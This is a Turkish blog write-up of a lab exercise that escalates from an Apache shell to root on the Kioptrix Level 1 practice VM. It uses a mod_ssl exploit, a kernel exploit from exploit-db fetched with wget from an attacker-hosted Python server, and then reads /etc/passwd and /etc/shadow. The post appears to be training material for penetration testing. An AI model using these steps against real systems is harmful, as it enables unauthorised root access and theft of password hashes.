loader image

Kioptrix Level 1 — Yetki Yükseltme Saldırısı

Herkese merhaba bu yazımda Kioptrix serisinin devamı olan Kioptrix Level 1′de yetki yükseltmeyi uygulayarak anlatacağım. Bir önceki yazıma buradan ulaşabilirsiniz.

Nerede Kalmıştık

Zafiyetli makinemizin içine girerek exploit işlemini gerçekleştirdim ve shell almış oldum. (Apache)

Yine işlemimize VMware’den Kali ve Kioptrix’i çalıştırıyorum.

Bir önceki çalışmamda yapmış olduğum gcc compiler işlemini /home/kali altına kaydetmiştim. Bu noktadan devam ediyoruz. Çünkü orada biz normal kullanıcı yetkilerine sahip Apache kullanıcısı elde etmiştik.

1. Adım

./mod ssl_compiler çalıştırarak başlıyoruz.

Sarı renkle belirttiğim gibi usage header’daki gibi parametremizi giriceceğiz. İşletim sistemmize göre off-setimiz olan 0x6b yada 0x6a yı seçebiliriz.

0x6b yada 0x6a

2. Adım

Parametremizi usage‘da gördüğümüz şekilde giriyoruz.

Sarı: Modül adı

Yeşil: Off-set

Kırmızı: Hedef IP (Kioptrix)

Mavi: Connection

Parametremizi çalıştırıyoruz ve shell alıyoruz.

Shell’imiz aldık

whoami komutunu çalıştırdığımda sistem bana Apache kullanıcısı olduğumu belirtti. Ancak, root erişimi sağlamak istediğimde buna izin verilmedi. Daha sonra, uname -r komutu ile sistemimizin kernel versiyonunu öğrendim; bu versiyon 2.4.7 olarak görünüyor. Bu durumda, araştırma yaparken kernel versiyonunun ilk iki hanesiyle (yani 2.4 ile) sınırlı kalmamız yeterli olacaktır.

4. Adım

Şu an bir araştırma süreci içerisindeyim. Çeşitli kaynaklardan yararlanılsa da genellikle exploit-db’yi tercih ediyorum.

Exploit-db’de yapılan aramalar sonucu, doğrulanmış bir dış exploit bulduğumu gözlemledim. Bu exploit, kernel üzerinden gerçekleştirilecek bir saldırıyı hedefliyor.

İndirme işlemi sonrasında, masaüstüme çektiğim .c uzantılı dosyayı derlemem gerekiyor.

5. Adım

Bu derleme işlemini, doğrudan makine üzerindeki Python modülü kullanarak yapmayı planlıyorum.

3.c dosyamız Desktop bölümünde olduğu için Desktop’da servis edicez.

Exploit işlemini gerçekleştirdiğimiz terminale geri dönüyoruz ve wget komutunu girerek exploit edeceğim kısmı çekmeye çalışacağız.

parameteremiz : wget http://(kali IP):8000/3.c

python 8000 portuyla servis etmeye çalıştığı için bizde 8000 portunu kullanıyoruz.

6. Adım

Kırmızı: ls komutuyla 3.c dosyasını görüyoruz. Şimdi sıra compiler işlemine geldi.

(Compiler) Yeşil: gcc 3.c -o ‘’tekrar’’ yazarak çıktı olarak vereceği için istediğiniz adı verebilirsiniz ben tekrar ismini verdim.

Sarı: Tekrar ls çalıştırdığımda dosyamın geldiğini görebiliyorum.

Beyaz: “tekrar” isimli dosyamı çalıştırmak için ./tekrar komutunu giriyorum.

Daha sonra whoami yaparak root olduğumu görüyorum. Böylece yetkimi yükseltmiş oldum. Daha önce Apache kullanıcısıydım şimdi root oldum.

Root olduğumuza göre Linux sisteme girdiğimizde 2 tane kritik dosya olan cat /etc/passwd ve cat/etc/shadow bakabiliriz.

cat /etc/passwd

Kullanıcı bilgilerine cat /etc/passwd komutunu çalıştırarak görebiliriz.

cat/etc/shadow

Kullanıcı şifrelerini cat/etc/shadow çalıştırarak görebiliriz. Şifreler hash’li olarak gelir.

Şapkan beyazsa kırmızıdan daha önde olmalısın…